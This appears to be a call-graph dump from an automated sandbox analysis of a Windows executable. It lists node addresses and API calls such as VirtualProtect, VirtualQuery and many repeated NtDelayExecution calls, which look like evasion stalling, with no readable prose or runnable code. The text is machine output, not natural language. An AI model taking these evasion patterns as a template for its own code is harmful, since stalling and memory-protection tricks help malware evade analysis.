                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 2838 140001ac3 2839 140001a70 2838->2839 2840 14000199e 2839->2840 2841 140001b36 2839->2841 2845 140001b53 2839->2845 2843 140001a0f 2840->2843 2844 1400019e9 VirtualProtect 2840->2844 2842 140001ba0 4 API calls 2841->2842 2842->2845 2844->2840 1989 140001ae4 1990 140001a70 1989->1990 1991 14000199e 1990->1991 1992 140001b36 1990->1992 1995 140001b53 1990->1995 1994 140001a0f 1991->1994 1996 1400019e9 VirtualProtect 1991->1996 1997 140001ba0 1992->1997 1996->1991 2000 140001bc2 1997->2000 1998 140001c04 memcpy 1998->1995 2000->1998 2001 140001c45 VirtualQuery 2000->2001 2002 140001cf4 2000->2002 2001->2002 2006 140001c72 2001->2006 2003 140001d23 GetLastError 2002->2003 2004 140001d37 2003->2004 2005 140001ca4 VirtualProtect 2005->1998 2005->2003 2006->1998 2006->2005 2034 140001404 2107 140001394 2034->2107 2036 140001413 2037 140001394 2 API calls 2036->2037 2038 140001422 2037->2038 2039 140001394 2 API calls 2038->2039 2040 140001431 2039->2040 2041 140001394 2 API calls 2040->2041 2042 140001440 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000144f 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000145e 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000146d 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000147c 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000148b 2051->2052 2053 140001394 2 API calls 2052->2053 2054 14000149a 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014a9 2055->2056 2057 140001394 2 API calls 2056->2057 2058 1400014b8 2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014c7 2059->2060 2061 140001394 2 API calls 2060->2061 2062 1400014d6 2061->2062 2063 1400014e5 2062->2063 2064 140001394 2 API calls 2062->2064 2065 140001394 2 API calls 2063->2065 2064->2063 2066 1400014ef 2065->2066 2067 1400014f4 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 1400014fe 2069->2070 2071 140001503 2070->2071 2072 140001394 2 API calls 2070->2072 2073 140001394 2 API calls 2071->2073 2072->2071 2074 14000150d 2073->2074 2075 140001394 2 API calls 2074->2075 2076 140001512 2075->2076 2077 140001394 2 API calls 2076->2077 2078 140001521 2077->2078 2079 140001394 2 API calls 2078->2079 2080 140001530 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000153f 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000154e 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000155d 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000156c 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000157b 2089->2090 2091 140001394 2 API calls 2090->2091 2092 14000158a 2091->2092 2093 140001394 2 API calls 2092->2093 2094 140001599 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015a8 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015b7 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015c6 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015d5 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015e4 2103->2104 2105 140001394 2 API calls 2104->2105 2106 1400015f3 2105->2106 2108 140005a40 malloc 2107->2108 2109 1400013b8 2108->2109 2110 1400013c6 NtDelayExecution 2109->2110 2110->2036 2111 140002104 2112 140002111 EnterCriticalSection 2111->2112 2117 140002218 2111->2117 2113 14000220b LeaveCriticalSection 2112->2113 2118 14000212e 2112->2118 2113->2117 2114 140002272 2115 14000214d TlsGetValue GetLastError 2115->2118 2116 140002241 DeleteCriticalSection 2116->2114 2117->2114 2117->2116 2118->2113 2118->2115 2007 140001e65 2008 140001e67 signal 2007->2008 2009 140001e7c 2008->2009 2011 140001e99 2008->2011 2010 140001e82 signal 2009->2010 2009->2011 2010->2011 2846 140001f47 2847 140001e67 signal 2846->2847 2850 140001e99 2846->2850 2848 140001e7c 2847->2848 2847->2850 2849 140001e82 signal 2848->2849 2848->2850 2849->2850 2012 14000216f 2013 140002178 InitializeCriticalSection 2012->2013 2014 140002185 2012->2014 2013->2014 2015 140001a70 2016 14000199e 2015->2016 2020 140001a7d 2015->2020 2017 140001a0f 2016->2017 2018 1400019e9 VirtualProtect 2016->2018 2018->2016 2019 140001b53 2020->2015 2020->2019 2021 140001b36 2020->2021 2022 140001ba0 4 API calls 2021->2022 2022->2019 2119 140001e10 2120 140001e2f 2119->2120 2121 140001ecc 2120->2121 2125 140001eb5 2120->2125 2126 140001e55 2120->2126 2122 140001ed3 signal 2121->2122 2121->2125 2123 140001ee4 2122->2123 2122->2125 2124 140001eea signal 2123->2124 2123->2125 2124->2125 2126->2125 2127 140001f12 signal 2126->2127 2127->2125 2851 140002050 2852 14000205e EnterCriticalSection 2851->2852 2853 1400020cf 2851->2853 2854 1400020c2 LeaveCriticalSection 2852->2854 2855 140002079 2852->2855 2854->2853 2855->2854 2856 140001fd0 2857 140001fe4 2856->2857 2858 140002033 2856->2858 2857->2858 2859 140001ffd EnterCriticalSection LeaveCriticalSection 2857->2859 2859->2858 2136 140001ab3 2137 140001a70 2136->2137 2137->2136 2138 14000199e 2137->2138 2139 140001b36 2137->2139 2142 140001b53 2137->2142 2141 140001a0f 2138->2141 2143 1400019e9 VirtualProtect 2138->2143 2140 140001ba0 4 API calls 2139->2140 2140->2142 2143->2138 1979 140001394 1983 140005a40 1979->1983 1981 1400013b8 1982 1400013c6 NtDelayExecution 1981->1982 1984 140005a5e 1983->1984 1987 140005a8b 1983->1987 1984->1981 1985 140005b33 1986 140005b4f malloc 1985->1986 1988 140005b70 1986->1988 1987->1984 1987->1985 1988->1984 2128 14000219e 2129 140002272 2128->2129 2130 1400021ab EnterCriticalSection 2128->2130 2131 140002265 LeaveCriticalSection 2130->2131 2133 1400021c8 2130->2133 2131->2129 2132 1400021e9 TlsGetValue GetLastError 2132->2133 2133->2131 2133->2132 2023 140001000 2024 14000108b __set_app_type 2023->2024 2025 140001040 2023->2025 2027 1400010b6 2024->2027 2025->2024 2026 1400010e5 2027->2026 2029 140001e00 2027->2029 2030 140005fd0 __setusermatherr 2029->2030 2031 140001800 2032 140001812 2031->2032 2033 140001835 fprintf 2032->2033 2134 140002320 strlen 2135 140002337 2134->2135 2144 140001140 2147 140001160 2144->2147 2146 140001156 2148 1400011b9 2147->2148 2149 14000118b 2147->2149 2150 1400011d3 2148->2150 2151 1400011c7 _amsg_exit 2148->2151 2149->2148 2152 1400011a0 Sleep 2149->2152 2153 140001201 _initterm 2150->2153 2154 14000121a 2150->2154 2151->2150 2152->2148 2152->2149 2153->2154 2170 140001880 2154->2170 2157 14000126a 2158 14000126f malloc 2157->2158 2159 14000128b 2158->2159 2161 1400012d0 2158->2161 2160 1400012a0 strlen malloc memcpy 2159->2160 2160->2160 2160->2161 2181 140003150 2161->2181 2163 140001315 2164 140001344 2163->2164 2165 140001324 2163->2165 2168 140001160 53 API calls 2164->2168 2166 140001338 2165->2166 2167 14000132d _cexit 2165->2167 2166->2146 2167->2166 2169 140001366 2168->2169 2169->2146 2171 1400018a2 2170->2171 2172 140001247 SetUnhandledExceptionFilter 2170->2172 2171->2172 2173 14000194d 2171->2173 2177 140001a20 2171->2177 2172->2157 2174 14000199e 2173->2174 2175 140001ba0 4 API calls 2173->2175 2174->2172 2176 1400019e9 VirtualProtect 2174->2176 2175->2173 2176->2174 2177->2174 2178 140001b53 2177->2178 2179 140001b36 2177->2179 2180 140001ba0 4 API calls 2179->2180 2180->2178 2184 140003166 2181->2184 2182 140003264 wcslen 2258 14000153f 2182->2258 2184->2182 2186 14000345e 2186->2163 2192 14000335f 2193 140003407 wcslen 2192->2193 2194 14000341d 2193->2194 2198 14000345c 2193->2198 2195 140003430 _wcsnicmp 2194->2195 2196 140003446 wcslen 2195->2196 2195->2198 2196->2195 2196->2198 2197 140003521 wcscpy wcscat 2200 140003553 2197->2200 2198->2197 2199 1400035a3 wcscpy wcscat 2202 1400035d9 2199->2202 2200->2199 2201 1400036ee wcscpy wcscat 2204 140003727 2201->2204 2202->2201 2203 140003a81 wcslen 2205 140003a8f 2203->2205 2209 140003acb 2203->2209 2204->2203 2206 140003aa0 _wcsnicmp 2205->2206 2207 140003ab6 wcslen 2206->2207 2206->2209 2207->2206 2207->2209 2208 140003bda wcscpy wcscat 2211 140003c0f 2208->2211 2209->2208 2210 140003c5f wcscpy wcscat 2213 140003c98 2210->2213 2211->2210 2212 140003cd5 wcscpy wcscat 2215 140003d1c 2212->2215 2213->2212 2214 140003d6e wcscpy wcscat wcslen 2398 14000146d 2214->2398 2215->2214 2220 140003e85 2484 1400014a9 2220->2484 2221 140003fc8 2223 14000145e 2 API calls 2221->2223 2230 140003f1c 2223->2230 2225 140003fb7 2227 14000145e 2 API calls 2225->2227 2226 1400056c7 2227->2230 2229 14000405a wcscpy wcscat wcslen 2242 140004130 2229->2242 2230->2226 2230->2229 2233 140003f10 2234 14000145e 2 API calls 2233->2234 2234->2230 2235 140004225 wcslen 2236 14000153f 2 API calls 2235->2236 2236->2242 2237 1400052ea memcpy 2237->2242 2238 14000441b wcslen 2645 14000157b 2238->2645 2239 14000468d wcslen 2241 14000153f 2 API calls 2239->2241 2241->2242 2242->2235 2242->2237 2242->2238 2242->2239 2243 140004f81 wcscpy wcscat wcslen 2242->2243 2246 140004513 wcslen 2242->2246 2249 14000457f _wcsnicmp 2242->2249 2250 1400050c3 2242->2250 2251 14000544c memcpy 2242->2251 2252 1400026e0 9 API calls 2242->2252 2253 14000516e wcslen 2242->2253 2255 140004dd5 wcscpy wcscat wcslen 2242->2255 2257 14000145e NtDelayExecution malloc 2242->2257 2600 1400014d6 2242->2600 2673 140001521 2242->2673 2771 140001431 2242->2771 2244 140001422 2 API calls 2243->2244 2244->2242 2662 1400015a8 2246->2662 2249->2242 2250->2163 2251->2242 2252->2242 2254 1400015a8 2 API calls 2253->2254 2254->2242 2702 140001422 2255->2702 2257->2242 2259 140001394 2 API calls 2258->2259 2260 14000154e 2259->2260 2261 140001394 2 API calls 2260->2261 2262 14000155d 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000156c 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000157b 2265->2266 2267 140001394 2 API calls 2266->2267 2268 14000158a 2267->2268 2269 140001394 2 API calls 2268->2269 2270 140001599 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015a8 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015b7 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015c6 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015d5 2277->2278 2279 140001394 2 API calls 2278->2279 2280 1400015e4 2279->2280 2281 140001394 2 API calls 2280->2281 2282 1400015f3 2281->2282 2282->2186 2283 140001503 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000150d 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001512 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001521 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001530 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000153f 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000154e 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000155d 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000156c 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000157b 2300->2301 2302 140001394 2 API calls 2301->2302 2303 14000158a 2302->2303 2304 140001394 2 API calls 2303->2304 2305 140001599 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015a8 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015b7 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015c6 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015d5 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015e4 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015f3 2316->2317 2317->2192 2318 14000156c 2317->2318 2319 140001394 2 API calls 2318->2319 2320 14000157b 2319->2320 2321 140001394 2 API calls 2320->2321 2322 14000158a 2321->2322 2323 140001394 2 API calls 2322->2323 2324 140001599 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015a8 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015b7 2327->2328 2329 140001394 2 API calls 2328->2329 2330 1400015c6 2329->2330 2331 140001394 2 API calls 2330->2331 2332 1400015d5 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400015e4 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400015f3 2335->2336 2336->2192 2337 14000145e 2336->2337 2338 140001394 2 API calls 2337->2338 2339 14000146d 2338->2339 2340 140001394 2 API calls 2339->2340 2341 14000147c 2340->2341 2342 140001394 2 API calls 2341->2342 2343 14000148b 2342->2343 2344 140001394 2 API calls 2343->2344 2345 14000149a 2344->2345 2346 140001394 2 API calls 2345->2346 2347 1400014a9 2346->2347 2348 140001394 2 API calls 2347->2348 2349 1400014b8 2348->2349 2350 140001394 2 API calls 2349->2350 2351 1400014c7 2350->2351 2352 140001394 2 API calls 2351->2352 2353 1400014d6 2352->2353 2354 1400014e5 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 1400014ef 2356->2357 2358 1400014f4 2357->2358 2359 140001394 2 API calls 2357->2359 2360 140001394 2 API calls 2358->2360 2359->2358 2361 1400014fe 2360->2361 2362 140001503 2361->2362 2363 140001394 2 API calls 2361->2363 2364 140001394 2 API calls 2362->2364 2363->2362 2365 14000150d 2364->2365 2366 140001394 2 API calls 2365->2366 2367 140001512 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001521 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001530 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000153f 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000154e 2374->2375 2376 140001394 2 API calls 2375->2376 2377 14000155d 2376->2377 2378 140001394 2 API calls 2377->2378 2379 14000156c 2378->2379 2380 140001394 2 API calls 2379->2380 2381 14000157b 2380->2381 2382 140001394 2 API calls 2381->2382 2383 14000158a 2382->2383 2384 140001394 2 API calls 2383->2384 2385 140001599 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015a8 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015b7 2388->2389 2390 140001394 2 API calls 2389->2390 2391 1400015c6 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400015d5 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400015e4 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400015f3 2396->2397 2397->2192 2399 140001394 2 API calls 2398->2399 2400 14000147c 2399->2400 2401 140001394 2 API calls 2400->2401 2402 14000148b 2401->2402 2403 140001394 2 API calls 2402->2403 2404 14000149a 2403->2404 2405 140001394 2 API calls 2404->2405 2406 1400014a9 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014b8 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014c7 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014d6 2411->2412 2413 1400014e5 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 1400014ef 2415->2416 2417 1400014f4 2416->2417 2418 140001394 2 API calls 2416->2418 2419 140001394 2 API calls 2417->2419 2418->2417 2420 1400014fe 2419->2420 2421 140001503 2420->2421 2422 140001394 2 API calls 2420->2422 2423 140001394 2 API calls 2421->2423 2422->2421 2424 14000150d 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001512 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001521 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001530 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000153f 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000154e 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000155d 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000156c 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000157b 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000158a 2441->2442 2443 140001394 2 API calls 2442->2443 2444 140001599 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015a8 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015b7 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015c6 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015d5 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015e4 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015f3 2455->2456 2456->2230 2457 140001530 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000153f 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000154e 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000155d 2462->2463 2464 140001394 2 API calls 2463->2464 2465 14000156c 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000157b 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000158a 2468->2469 2470 140001394 2 API calls 2469->2470 2471 140001599 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015a8 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015b7 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015c6 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015d5 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015e4 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015f3 2482->2483 2483->2220 2483->2221 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2225 2535 140001440 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000144f 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000145e 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000146d 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000147c 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000148b 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000149a 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400014a9 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014b8 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014c7 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014d6 2554->2555 2556 1400014e5 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 1400014ef 2558->2559 2560 1400014f4 2559->2560 2561 140001394 2 API calls 2559->2561 2562 140001394 2 API calls 2560->2562 2561->2560 2563 1400014fe 2562->2563 2564 140001503 2563->2564 2565 140001394 2 API calls 2563->2565 2566 140001394 2 API calls 2564->2566 2565->2564 2567 14000150d 2566->2567 2568 140001394 2 API calls 2567->2568 2569 140001512 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001521 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001530 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000153f 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000154e 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000155d 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000156c 2580->2581 2582 140001394 2 API calls 2581->2582 2583 14000157b 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000158a 2584->2585 2586 140001394 2 API calls 2585->2586 2587 140001599 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015a8 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015b7 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015c6 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015d5 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015e4 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015f3 2598->2599 2599->2225 2599->2233 2601 1400014e5 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 1400014ef 2603->2604 2605 1400014f4 2604->2605 2606 140001394 2 API calls 2604->2606 2607 140001394 2 API calls 2605->2607 2606->2605 2608 1400014fe 2607->2608 2609 140001503 2608->2609 2610 140001394 2 API calls 2608->2610 2611 140001394 2 API calls 2609->2611 2610->2609 2612 14000150d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 140001512 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001521 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001530 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000153f 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000154e 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000155d 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000156c 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000157b 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000158a 2629->2630 2631 140001394 2 API calls 2630->2631 2632 140001599 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015a8 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015b7 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015c6 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015d5 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015e4 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015f3 2643->2644 2644->2242 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2242 2663 140001394 2 API calls 2662->2663 2664 1400015b7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400015c6 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015d5 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015e4 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015f3 2671->2672 2672->2242 2674 140001394 2 API calls 2673->2674 2675 140001530 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000153f 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000154e 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000155d 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000156c 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000157b 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000158a 2686->2687 2688 140001394 2 API calls 2687->2688 2689 140001599 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015a8 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015b7 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015c6 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015d5 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015e4 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015f3 2700->2701 2701->2242 2703 140001394 2 API calls 2702->2703 2704 140001431 2703->2704 2705 140001394 2 API calls 2704->2705 2706 140001440 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000144f 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000145e 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000146d 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000147c 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000148b 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000149a 2717->2718 2719 140001394 2 API calls 2718->2719 2720 1400014a9 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014b8 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014c7 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014d6 2725->2726 2727 1400014e5 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 1400014ef 2729->2730 2731 1400014f4 2730->2731 2732 140001394 2 API calls 2730->2732 2733 140001394 2 API calls 2731->2733 2732->2731 2734 1400014fe 2733->2734 2735 140001503 2734->2735 2736 140001394 2 API calls 2734->2736 2737 140001394 2 API calls 2735->2737 2736->2735 2738 14000150d 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001512 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001521 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001530 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000153f 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000154e 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000155d 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000156c 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000157b 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000158a 2755->2756 2757 140001394 2 API calls 2756->2757 2758 140001599 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015a8 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015b7 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015c6 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 2770->2242 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 2836->2837 2837->2242

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
